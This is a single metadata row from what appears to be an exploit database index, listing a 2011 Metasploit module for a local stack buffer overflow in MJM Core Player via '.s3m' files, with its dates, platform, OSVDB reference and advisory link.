 17230,exploits/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Local Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,local,windows,,2011-04-30,2011-04-30,1,OSVDB-72101,"Metasploit Framework (MSF)",,,,http://www.corelan.be/advisories.php?id=CORELAN-11-004